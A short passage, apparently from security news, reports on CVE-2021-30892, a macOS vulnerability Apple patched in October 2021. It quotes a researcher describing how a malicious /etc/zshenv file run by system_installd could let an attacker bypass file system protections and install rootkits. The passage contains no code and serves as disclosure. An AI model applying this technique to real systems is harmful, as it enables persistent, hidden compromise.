Apple said it remediated the problem with additional restrictions as part of security updates pushed on October 26, 2021.
Successful exploitation of CVE-2021-30892 could enable a malicious application to modify protected parts of the file system, including the capability to install malicious kernel drivers (aka rootkits), overwrite system files, or install persistent, undetectable malware.
'Therefore, for attackers to perform arbitrary operations on the device, a fully reliable path they could take would be to create a malicious /etc/zshenv file and then wait for system_installd to invoke zsh.' 'Interestingly, when zsh starts, it looks for the file /etc/zshenv, and - if found - runs commands from that file automatically, even in non-interactive mode,' Bar Or said.
